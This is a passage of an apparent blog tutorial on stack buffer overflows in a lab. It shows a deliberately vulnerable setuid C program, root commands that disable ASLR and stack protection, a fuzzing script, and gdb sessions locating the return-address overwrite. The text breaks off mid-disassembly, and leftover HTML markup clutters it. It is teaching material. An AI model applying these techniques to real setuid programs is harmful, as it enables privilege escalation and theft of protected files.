πŸ”’
❌
There are new articles available, click to refresh the page.
Before yesterdayeXploit

Plain Buffer Overflow

8 May 2014 at 16:35
By: 0xe7
pThis is the start of a series of tutorials exploring how to detect and exploit a href="https://en.wikipedia.org/wiki/Stack_%28abstract_data_type%29" target="_blank"stack/a based vulnerabilities on x86-32 Linux systems. As this is the first it will involve detecting and exploiting a a href="https://en.wikipedia.org/wiki/Buffer_overflow" target="_blank"buffer overflow/a on a system with no protections in place. Modern protections will be explored in future tutorials but its important to understand the basics before trying to take on the more complex situations./p pA buffer overflow happens when a programmer has not done sufficient bounds checking while or before copying the contents of one buffer into another. A buffer is normally a variable array (stack) or memory allocated using a dynamic memory allocation function (a href="https://en.wikipedia.org/wiki/Memory_management#Dynamic_memory_allocation" target="_blank"heap/a). We will be concentrating on stack based (variable array) buffer overflows at first as they are much easier to understand for beginners./p pAll of the code in this tutorial was written by the author./p !--more-- h2The Vulnerable App/h2 pBelow is the source code of the vulnerable application that we will be attacking. It is written in a href="https://en.wikipedia.org/wiki/C_%28programming_language%29" target="_blank"C/a./p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/span span class="code-line"span class="normal"36/span/span span class="code-line"span class="normal"37/span/span span class="code-line"span class="normal"38/span/span span class="code-line"span class="normal"39/span/span span class="code-line"span class="normal"40/span/span span class="code-line"span class="normal"41/span/span span class="code-line"span class="normal"42/span/span span class="code-line"span class="normal"43/span/span span class="code-line"span class="normal"44/span/span span class="code-line"span class="normal"45/span/span span class="code-line"span class="normal"46/span/span span class="code-line"span class="normal"47/span/span span class="code-line"span class="normal"48/span/span span class="code-line"span class="normal"49/span/span span class="code-line"span class="normal"50/span/span span class="code-line"span class="normal"51/span/span span class="code-line"span class="normal"52/span/span span class="code-line"span class="normal"53/span/span span class="code-line"span class="normal"54/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;stdio.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;string.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;stdlib.hgt;/spanspan class="cp"/span/span span class="code-line"/span span class="code-line"span class="cp"#define PASS quot;topsecretpasswordquot;/span/span span class="code-line"/span span class="code-line"span class="cp"#define SFILE quot;secret.txtquot;/span/span span class="code-line"/span span class="code-line"span class="kt"int/spanspan class="w" /spanspan class="nf"checkpass/spanspan class="p"(/spanspan class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="n"p/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"printfile/spanspan class="p"();/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"int/spanspan class="w" /spanspan class="nf"main/spanspan class="p"(/spanspan class="kt"int/spanspan class="w" /spanspan class="n"argc/spanspan class="p",/spanspan class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="o"**/spanspan class="n"argv/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"r/spanspan class="p";/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"argc/spanspan class="w" /spanspan class="o"lt;/spanspan class="w" /spanspan class="mi"2/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Usage: quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="n"argv/spanspan class="p"[/spanspan class="mi"0/spanspan class="p"]);/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot; lt;passwordgt;/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"r/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"checkpass/spanspan class="p"(/spanspan class="n"argv/spanspan class="p"[/spanspan class="mi"1/spanspan class="p"]);/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"r/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="mi"0/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Wrong password: quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="n"argv/spanspan class="p"[/spanspan class="mi"1/spanspan class="p"]);/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printfile/spanspan class="p"();/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"int/spanspan class="w" /spanspan class="nf"checkpass/spanspan class="p"(/spanspan class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="n"a/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="n"p/spanspan class="p"[/spanspan class="mi"512/spanspan class="p"];/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"r/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"strncpy/spanspan class="p"(/spanspan class="n"p/spanspan class="p",/spanspan class="w" /spanspan class="n"a/spanspan class="p",/spanspan class="w" /spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"a/spanspan class="p")/spanspan class="o"+/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"r/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"strcmp/spanspan class="p"(/spanspan class="n"p/spanspan class="p",/spanspan class="w" /spanspan class="n"PASS/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"return/spanspan class="w" /spanspan class="n"r/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"printfile/spanspan class="p"()/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"FILE/spanspan class="w" /spanspan class="o"*/spanspan class="n"f/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"c/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"f/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"fopen/spanspan class="p"(/spanspan class="n"SFILE/spanspan class="p",/spanspan class="w" /spanspan class="s"quot;rquot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"f/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"while/spanspan class="w" /spanspan class="p"((/spanspan class="n"c/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"getc/spanspan class="p"(/spanspan class="n"f/spanspan class="p"))/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="n"EOF/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"putchar/spanspan class="p"(/spanspan class="n"c/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"fclose/spanspan class="p"(/spanspan class="n"f/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w" /spanspan class="k"else/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Error opening file: quot;/spanspan class="w" /spanspan class="n"SFILE/spanspan class="w" /spanspan class="s"quot;/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table h3The Fix/h3 pThe code in the above application that is vulnerable to a stack based buffer overflow is on line 36 (codestrncpy(p, a, strlen(a)+1);/code). Here the programmer has wrongly calculated the maximum number of bytes that can be copied into the buffer codep/code as codestrlen(a)+1/code, this calculation is in fact based on the length of the input provided by the user and is controled by the user. To fix this vulnerability, this line should be changed to codestrncpy(p, a, sizeof(p)-1);/code or codestrncpy(p, a, 511);/code, we minus the 1 byte to leave space for the terminating null character 'code\0/code'. For more information about strncpy see a href="http://linux.die.net/man/3/strncpy" target="_blank"man strncpy/a./p h2Setting Up The Environment/h2 pThis is how to setup the environment in full on a a href="https://www.debian.org/" target="_blank"Debian/a based system:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/span span class="code-line"span class="normal"36/span/span span class="code-line"span class="normal"37/span/span span class="code-line"span class="normal"38/span/span span class="code-line"span class="normal"39/span/span span class="code-line"span class="normal"40/span/span span class="code-line"span class="normal"41/span/span span class="code-line"span class="normal"42/span/span span class="code-line"span class="normal"43/span/span span class="code-line"span class="normal"44/span/span span class="code-line"span class="normal"45/span/span span class="code-line"span class="normal"46/span/span span class="code-line"span class="normal"47/span/span span class="code-line"span class="normal"48/span/span span class="code-line"span class="normal"49/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~# /spanadduser testuser/span span class="code-line"span class="go"Adding user `testuser#39; .../span/span span class="code-line"span class="go"Adding new group `testuser#39; (1001) .../span/span span class="code-line"span class="go"Adding new user `testuser#39; (1001) with group `testuser#39; .../span/span span class="code-line"span class="go"Creating home directory `/home/testuser#39; .../span/span span class="code-line"span class="go"Copying files from `/etc/skel#39; .../span/span span class="code-line"span class="go"Enter new UNIX password: /span/span span class="code-line"span class="go"Retype new UNIX password: /span/span span class="code-line"span class="go"passwd: password updated successfully/span/span span class="code-line"span class="go"Changing the user information for testuser/span/span span class="code-line"span class="go"Enter the new value, or press ENTER for the default/span/span span class="code-line"span class="go" Full Name []: /span/span span class="code-line"span class="go" Room Number []: /span/span span class="code-line"span class="go" Work Phone []: /span/span span class="code-line"span class="go" Home Phone []: /span/span span class="code-line"span class="go" Other []: /span/span span class="code-line"span class="go"Is the information correct? [Y/n]/span/span span class="code-line"span class="gp"[email protected]:~# /spanls/span span class="code-line"span class="go"app.c/span/span span class="code-line"span class="gp"[email protected]:~# /spangcc -z execstack -fno-stack-protector -o app app.c/span span class="code-line"span class="gp"[email protected]:~# /spancp app /home/testuser//span span class="code-line"span class="gp"[email protected]:~# /spancat /proc/sys/kernel/randomize_va_space /span span class="code-line"span class="go"2/span/span span class="code-line"span class="gp"[email protected]:~# /spanspan class="nb"echo/span span class="m"0/span gt; /proc/sys/kernel/randomize_va_space/span span class="code-line"span class="gp"[email protected]:~# /spancat /proc/sys/kernel/randomize_va_space/span span class="code-line"span class="go"0/span/span span class="code-line"span class="gp"[email protected]:~# /spanspan class="nb"cd/span /home/testuser//span span class="code-line"span class="gp"[email protected]:/home/testuser# /spanls -l app/span span class="code-line"span class="go"-rwxr-xr-x 1 root root 6242 Apr 17 16:48 app/span/span span class="code-line"span class="gp"[email protected]:/home/testuser# /spanchmod u+s app/span span class="code-line"span class="gp"[email protected]:/home/testuser# /spanls -l app/span span class="code-line"span class="go"-rwsr-xr-x 1 root root 6242 Apr 17 16:48 app/span/span span class="code-line"span class="gp"[email protected]:/home/testuser# /spanspan class="nb"echo/span span class="err"#39;/spanThis is a top secret file!/span span class="code-line"span class="go"gt; Only people with the password should be able to view this file!#39; gt; secret.txt/span/span span class="code-line"span class="gp"[email protected]:/home/testuser# /spanls -l secret.txt/span span class="code-line"span class="go"-rw-r--r-- 1 root root 91 May 9 13:40 secret.txt/span/span span class="code-line"span class="gp"[email protected]:/home/testuser# /spanchmod span class="m"600/span secret.txt/span span class="code-line"span class="gp"[email protected]:/home/testuser# /spanls -l secret.txt/span span class="code-line"span class="go"-rw------- 1 root root 91 May 9 13:40 secret.txt/span/span span class="code-line"span class="gp"[email protected]:/home/testuser# /spancat secret.txt/span span class="code-line"span class="go"This is a top secret file!/span/span span class="code-line"span class="go"Only people with the password should be able to view this file!/span/span span class="code-line"span class="gp"[email protected]:/home/testuser# /spansu - testuser/span span class="code-line"span class="gp"[email protected]:~$ /spanls -l app/span span class="code-line"span class="go"-rwsr-xr-x 1 root root 6242 Apr 17 16:48 app/span/span span class="code-line"span class="gp"[email protected]:~$ /spanls -l secret.txt /span span class="code-line"span class="go"-rw------- 1 root root 91 May 9 13:40 secret.txt/span/span span class="code-line"span class="gp"[email protected]:~$ /spancat secret.txt/span span class="code-line"span class="go"cat: secret.txt: Permission denied/span/span span class="code-line"/code/pre/div /td/tr/table pSo our environment is setup and ready for exploit development. Firstly a testuser is added to run the application as, then on line 20 the application is compiled with stack protections removed. On line 24 ASLR is disabled and on line 30 the application has the setuid bit set so that when run the application can run with root privileges (which is required to read the file created on lines 33 and 34). Lastly confirmation that the file is not readable by the user that runs the application is on lines 48 and 49./p h2Testing The App / Finding The Vulnerability/h2 pFirst we need to use the application to figure out its inputs and see how the application acts normally:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/span span class="code-line"span class="normal"6/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /span./app/span span class="code-line"span class="go"Usage: ./app lt;passwordgt;/span/span span class="code-line"span class="gp"[email protected]:~$ /span./app span class="nb"test/span/span span class="code-line"span class="go"Wrong password: test/span/span span class="code-line"span class="gp"[email protected]:~$ echo $/span?/span span class="code-line"span class="go"1/span/span span class="code-line"/code/pre/div /td/tr/table pAs we can see, when we enter the wrong password the applications exit code is code1/code, let's try fuzzing this input to look for a buffer overflow, here is a simple python script that can do that:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="ch"#!/usr/bin/env python/span/span span class="code-line"/span span class="code-line"span class="kn"import/span span class="nn"os/span/span span class="code-line"span class="kn"from/span span class="nn"subprocess/span span class="kn"import/span span class="n"Popen/spanspan class="p",/span span class="n"PIPE/span/span span class="code-line"/span span class="code-line"span class="n"count/spanspan class="o"=/spanspan class="mi"0/span span class="c1"# store the number when we cause a crash/span/span span class="code-line"/span span class="code-line"span class="k"for/span span class="n"i/span span class="ow"in/span span class="nb"range/spanspan class="p"(/spanspan class="mi"5000/spanspan class="p"):/span span class="c1"# loop through the numbers from 0 to 5000/span/span span class="code-line" span class="c1"# and use i as the incrementor/span/span span class="code-line"/span span class="code-line" span class="c1"# execute the file ./app with the argument quot;Aquot;*i so we keep/span/span span class="code-line" span class="c1"# increasing the number of A#39;s by 1/span/span span class="code-line" span class="n"process/span span class="o"=/span span class="n"Popen/spanspan class="p"([/spanspan class="s2"quot;./appquot;/spanspan class="p",/span span class="s2"quot;Aquot;/spanspan class="o"*/spanspan class="n"i/spanspan class="p"],/span span class="n"stdin/spanspan class="o"=/spanspan class="n"PIPE/spanspan class="p",/span span class="n"stdout/spanspan class="o"=/spanspan class="n"PIPE/spanspan class="p")/span/span span class="code-line" span class="p"(/spanspan class="n"output/spanspan class="p",/span span class="n"err/spanspan class="p")/span span class="o"=/span span class="n"process/spanspan class="o"./spanspan class="n"communicate/spanspan class="p"()/span/span span class="code-line"/span span class="code-line" span class="n"exit_code/span span class="o"=/span span class="n"process/spanspan class="o"./spanspan class="n"wait/spanspan class="p"()/span span class="c1"# wait for the programs exit code/span/span span class="code-line" span class="k"if/span span class="n"exit_code/span span class="o"!=/span span class="mi"1/spanspan class="p":/span span class="c1"# if its not = 1/span/span span class="code-line" span class="n"count/span span class="o"=/span span class="n"i/span span class="c1"# set the count to i/span/span span class="code-line" span class="k"break/span span class="c1"# and break out of the loop/span/span span class="code-line"/span span class="code-line"/span span class="code-line"span class="nb"print/span span class="n"count/span span class="c1"# print the number of A#39;s it took to crash it/span/span span class="code-line"/code/pre/div /td/tr/table pRunning the python script gives us:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /spanpython app-fuzz.py/span span class="code-line"span class="go"524/span/span span class="code-line"/code/pre/div /td/tr/table h2Exploiting The App/h2 pSo the python script crashed the application by inserting 524 A's as its input. Just because we crashed the application it doesn't mean we took control of the applications execution, so we now need to figure out how many bytes we need to send before we hijack execution (one character is a single byte, so 524 A's is 524 bytes)./p pWe will use codegdb/code to do this. The hex for codeA/code is code41/code, you can figure this out using the ascii man page (a href="http://unixhelp.ed.ac.uk/CGI/man-cgi?ascii+7" target="_blank"man ascii/a), so what we are looking for is when the application crashes it should be trying to run code41414141/code (as this is a 32 bit system, each instruction is 32 bits long or 4 bytes):/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /spangdb -q ./app/span span class="code-line"span class="go"Reading symbols from /home/testuser/app...(no debugging symbols found)...done./span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"r $(python -c #39;print quot;Aquot; * 524#39;)/span/span span class="code-line"span class="go"Starting program: /home/testuser/app $(python -c #39;print quot;Aquot; * 524#39;)/span/span span class="code-line"/span span class="code-line"span class="go"Program received signal SIGSEGV, Segmentation fault./span/span span class="code-line"span class="go"0xb7ed9d03 in strchrnul () from /lib/i386-linux-gnu/i686/cmov/libc.so.6/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"r $(python -c #39;print quot;Aquot; * 528#39;)/span/span span class="code-line"span class="go"The program being debugged has been started already./span/span span class="code-line"span class="go"Start it from the beginning? (y or n) y/span/span span class="code-line"span class="go"Starting program: /home/testuser/app $(python -c #39;print quot;Aquot; * 528#39;)/span/span span class="code-line"/span span class="code-line"span class="go"Program received signal SIGSEGV, Segmentation fault./span/span span class="code-line"span class="go"0xbffff970 in ?? ()/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"r $(python -c #39;print quot;Aquot; * 532#39;)/span/span span class="code-line"span class="go"The program being debugged has been started already./span/span span class="code-line"span class="go"Start it from the beginning? (y or n) y/span/span span class="code-line"span class="go"Starting program: /home/testuser/app $(python -c #39;print quot;Aquot; * 532#39;)/span/span span class="code-line"/span span class="code-line"span class="go"Program received signal SIGSEGV, Segmentation fault./span/span span class="code-line"span class="go"0x41414141 in ?? ()/span/span span class="code-line"/code/pre/div /td/tr/table pWe increase the number of bytes by 4 each time because we are on a 32 bit system. So 528 bytes and then we hijack execution, you can see this as when the application crashes the instruction that the application is trying to run is code0x41414141/code (on line 21) which is just codeAAAA/code./p pI'm going to show you 2 ways you can exploit this, the first is very easy and just involves changing the flow of the application to bypass the password authentication. First we need to find the address of the code that is run after the check, again we'll use codegdb/code for this:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/span span class="code-line"span class="normal"36/span/span span class="code-line"span class="normal"37/span/span span class="code-line"span class="normal"38/span/span span class="code-line"span class="normal"39/span/span span class="code-line"span class="normal"40/span/span span class="code-line"span class="normal"41/span/span span class="code-line"span class="normal"42/span/span span class="code-line"span class="normal"43/span/span span class="code-line"span class="normal"44/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /spangdb -q ./app/span span class="code-line"span class="go"Reading symbols from /home/testuser/app...(no debugging symbols found)...done./span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"set disassembly-flavor intel/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"disassemble main/span/span span class="code-line"span class="go"Dump of assembler code for function main:/span/span span class="code-line"span class="go" 0x0804860c lt;+0gt;: push ebp/span/span span class="code-line"span class="go" 0x0804860d lt;+1gt;: mov ebp,esp/span/span span class="code-line"span class="go" 0x0804860f lt;+3gt;: and esp,0xfffffff0/span/span span class="code-line"span class="go" 0x08048612 lt;+6gt;: sub esp,0x20/span/span span class="code-line"span class="go" 0x08048615 lt;+9gt;: cmp DWORD PTR [ebp+0x8],0x1/span/span span class="code-line"span class="go" 0x08048619 lt;+13gt;: jg 0x804864c lt;main+64gt;/span/span span class="code-line"span class="go" 0x0804861b lt;+15gt;: mov DWORD PTR [esp],0x80487f0/span/span span class="code-line"span class="go" 0x08048622 lt;+22gt;: call 0x8048470 lt;[email protected];/span/span span class="code-line"span class="go" 0x08048627 lt;+27gt;: mov eax,DWORD PTR [ebp+0xc]/span/span span class="code-line"span class="go" 0x0804862a lt;+30gt;: mov eax,DWORD PTR [eax]/span/span span class="code-line"span class="go" 0x0804862c lt;+32gt;: mov DWORD PTR [esp],eax/span/span span class="code-line"span class="go" 0x0804862f lt;+35gt;: call 0x8048470 lt;[email protected];/span/span span class="code-line"span class="go" 0x08048634 lt;+40gt;: mov DWORD PTR [esp],0x80487f8/span/span span class="code-line"span class="go" 0x0804863b lt;+47gt;: call 0x80484a0 lt;[email protected];/span/span span class="code-line"span class="go" 0x08048640 lt;+52gt;: mov DWORD PTR [esp],0x1/span/span span class="code-line"span class="go" 0x08048647 lt;+59gt;: call 0x80484c0 lt;[email protected];/span/span span class="code-line"span class="go" 0x0804864c lt;+64gt;: mov eax,DWORD PTR [ebp+0xc]/span/span span class="code-line"span class="go" 0x0804864f lt;+67gt;: add eax,0x4/span/span span class="code-line"span class="go" 0x08048652 lt;+70gt;: mov eax,DWORD PTR [eax]/span/span span class="code-line"span class="go" 0x08048654 lt;+72gt;: mov DWORD PTR [esp],eax/span/span span class="code-line"span class="go" 0x08048657 lt;+75gt;: call 0x80486a2 lt;checkpassgt;/span/span span class="code-line"span class="go" 0x0804865c lt;+80gt;: mov DWORD PTR [esp+0x1c],eax/span/span span class="code-line"span class="go" 0x08048660 lt;+84gt;: cmp DWORD PTR [esp+0x1c],0x0/span/span span class="code-line"span class="go" 0x08048665 lt;+89gt;: je 0x804869b lt;main+143gt;/span/span span class="code-line"span class="go" 0x08048667 lt;+91gt;: mov DWORD PTR [esp],0x8048804/span/span span class="code-line"span class="go" 0x0804866e lt;+98gt;: call 0x8048470 lt;[email protected];/span/span span class="code-line"span class="go" 0x08048673 lt;+103gt;: mov eax,DWORD PTR [ebp+0xc]/span/span span class="code-line"span class="go" 0x08048676 lt;+106gt;: add eax,0x4/span/span span class="code-line"span class="go" 0x08048679 lt;+109gt;: mov eax,DWORD PTR [eax]/span/span span class="code-line"span class="go" 0x0804867b lt;+111gt;: mov DWORD PTR [esp],eax/span/span span class="code-line"span class="go" 0x0804867e lt;+114gt;: call 0x8048470 lt;[email protected];/span/span span class="code-line"span class="go" 0x08048683 lt;+119gt;: mov DWORD PTR [esp],0xa/span/span span class="code-line"span class="go" 0x0804868a lt;+126gt;: call 0x8048500 lt;[email protected];/span/span span class="code-line"span class="go" 0x0804868f lt;+131gt;: mov DWORD PTR 